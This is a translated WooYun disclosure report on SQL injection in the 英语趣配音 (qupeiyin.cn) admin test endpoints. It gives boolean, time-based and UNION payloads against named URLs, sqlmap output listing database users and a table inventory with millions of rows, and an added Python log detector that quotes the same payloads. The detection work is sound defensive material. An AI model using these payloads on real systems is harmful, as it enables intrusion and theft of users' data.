
Vulnerability summary

Defect ID: wooyun-2015-0112946

Title: Several SQL injections in 英语趣配音 leak the information of millions of users

Vendor: qupeiyin.cn

Author: 路人甲

Submitted: 2015-05-11 13:34

Fixed: 2015-06-27 10:40

Published: 2015-06-27 10:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-05-11: Details sent to the vendor, awaiting vendor handling
2015-05-13: Vendor confirmed; details disclosed to the vendor only
2015-05-23: Details disclosed to core white hats and relevant domain experts
2015-06-02: Details disclosed to regular white hats
2015-06-12: Details disclosed to intern white hats
2015-06-27: Details disclosed to the public

Brief description:

233

Detailed description:

1. http://admin.qupeiyin.cn/Weixin/test/share?study_show_id=1
2. http://admin.qupeiyin.cn/Weixin/test/dubbing?course_id=
Payload:
-1%20OR%203*2*1%3d6%20AND%2000014%3d00014
-1%20OR%203*2*2%3d6%20AND%2000014%3d00014

Proof of vulnerability:

Parameter: study_show_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: study_show_id=1) AND 3416=3416 AND (2897=2897
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: study_show_id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))yjyQ) AND (1949=1949
Type: UNION query
Title: MySQL UNION query (66) - 8 columns
Payload: study_show_id=1) UNION ALL SELECT 66,66,CONCAT(0x7178766a71,0x65475757677041747272,0x716b6b7171),66,66,66,66,66#
---
web application technology: Nginx, PHP 5.5.7
back-end DBMS: MySQL 5.0.12
current user is DBA: False
database management system users [4]:
[*] 'ishow'@'%'
[*] 'ishow'@'10.%'
[*] 'ishow'@'115.236.179.162'
[*] 'root'@'localhost'
available databases [5]:
[*] feizhuoa
[*] information_schema
[*] ishowgroup
[*] peiyin
[*] performance_schema
back-end DBMS: MySQL 5.0.12
Database: peiyin
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| visitor | 3885620 |
| messages | 2531915 |
| fans | 2068213 |
| show_top | 1435084 |
| study_show_info | 1434986 |
| study_show | 1434983 |
| comments | 1383915 |
| study_show_support | 1239518 |
| file_copy | 1183450 |
| study_show_copy | 1161214 |
| ucenter_member | 953757 |
| userinfo | 953731 |
| wechat_userinfo | 897580 |
| auth_token | 850685 |
| feedback_msglog | 834073 |
| pushinfo | 672344 |
| course_collect | 644258 |
| use_log | 630396 |
| outside_show_support | 474405 |
| picture | 463272 |
| words | 319321 |
| photo | 249939 |
| tieup_log | 159747 |
| user_spread | 142411 |
| messages_log | 112034 |
| spread_member | 102265 |
| album_through | 96479 |
| file | 40506 |
| feedback_msg | 37923 |
| guestbook | 35117 |
| search_keywords | 23560 |
| chat_wait_process | 19495 |
| school | 18819 |
| feedback | 18763 |
| spread_check | 16012 |
| course | 8284 |
| chat_members | 8200 |
| course_copy | 7931 |
| course_copy1 | 7931 |
| action_log | 7514 |
| home_recom | 6938 |
| course_nature | 6391 |
| activity_user | 3370 |
| stick | 3285 |
| syn_video | 3064 |
| spreader | 2684 |
| chat_member_course | 1973 |
| tch_class | 1597 |
| ugc_user_course | 1524 |
| slider | 1270 |
| course_edit | 1185 |
| course_album | 1069 |
| classes | 1050 |
| study_recomlog | 1031 |
| course_info | 819 |
| chat_task | 760 |
| winning_record | 731 |
| chat_group | 659 |
| location | 603 |
| area | 598 |
| auth_rule | 416 |
| album | 373 |
| menu | 346 |
| ugc_contribution | 296 |
| course_feedback | 269 |
| wechat_study_show | 256 |
| checksum | 250 |
| ugc_user | 241 |
| action_use | 224 |
| statistics | 185 |
| lessons_supports | 179 |
| report | 162 |
| push_message | 141 |
| camps | 114 |
| wechat_comment | 112 |
| ugc_group_photo | 67 |
| syn_page | 59 |
| lessons | 43 |
| auth_group_access | 42 |
| chat_category | 38 |
| wechat_support_record | 38 |
| nature | 37 |
| user_wisdom | 35 |
| gotye_regfail | 33 |
| teacher_apply | 33 |
| lessons_reserve | 31 |
| config | 30 |
| ugc_group | 26 |
| nature_copy | 23 |
| recommand | 23 |
| week_moon | 18 |
| mobile_code | 17 |
| auth_group | 16 |
| wechat_course | 15 |
| campus | 12 |
| `action` | 11 |
| hooks | 11 |
| auth_extend | 8 |
| ishow_class | 8 |
| article | 7 |
| lottery | 6 |
| course_category | 5 |
| gotye_msgid | 5 |
| basic_data | 4 |
| room | 4 |
| teacher | 4 |
| addons | 3 |
| activity | 2 |
| album_counter | 1 |
| course_counter | 1 |
| wechat_spread | 1 |
+-----------------------+---------+
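Defender-side illustration, added here and not part of the original report: a small Python detector that URL-decodes the query strings in Nginx access-log lines and flags the three probe families shown in the detailed description and the proof above (boolean tautologies such as `OR 3*2*1=6 AND 00014=00014`, `SLEEP()` time-based probes, and `UNION ALL SELECT`). The endpoint paths, parameter names and payloads come from the page; the log lines, the client IP and the Nginx "combined" log format are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Nginx "combined" log format (assumed); only ip and the request target are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Probe families seen in the report (sqlmap-style payloads).
SQLI_PATTERNS = {
    "boolean-tautology": re.compile(r"\b(?:OR|AND)\b\s*\(?\s*[\d*+\-]+\s*=\s*[\d*+\-]+", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}

def scan_line(line):
    """Return (client_ip, path, param, pattern_name) hits for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    hits = []
    # parse_qsl URL-decodes values; keep_blank_values so an empty course_id= is still seen.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        for label, pat in SQLI_PATTERNS.items():
            if pat.search(value):
                hits.append((m.group("ip"), parts.path, name, label))
    return hits

def scan_log(lines):
    """Scan a sequence of log lines and return every hit in order."""
    return [hit for line in lines for hit in scan_line(line)]

# Constructed sample log; the request payloads are the ones quoted in the report.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/May/2015:13:30:01 +0800] "GET /Weixin/test/share?study_show_id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/May/2015:13:30:02 +0800] "GET /Weixin/test/dubbing?course_id=-1%20OR%203*2*1%3d6%20AND%2000014%3d00014 HTTP/1.1" 200 8213 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [11/May/2015:13:30:03 +0800] "GET /Weixin/test/share?study_show_id=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))yjyQ)%20AND%20(1949%3d1949 HTTP/1.1" 200 512 "-" "sqlmap/1.0"',
    '203.0.113.5 - - [11/May/2015:13:30:09 +0800] "GET /Weixin/test/share?study_show_id=1)%20UNION%20ALL%20SELECT%2066,66,CONCAT(0x7178766a71,0x65475757677041747272,0x716b6b7171),66,66,66,66,66%23 HTTP/1.1" 200 640 "-" "sqlmap/1.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same check can be run over real logs line by line; a burst of hits from one client against one parameter is the signature of automated blind-injection probing like the one reported here.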

Fix recommendation:

~~

Copyright notice: when reposting, please credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-05-13 10:38

Vendor reply:

Many thanks for finding this vulnerability promptly. It was caused by a developer forgetting to comment out test code, and it has now been fixed.

Latest status:

None yet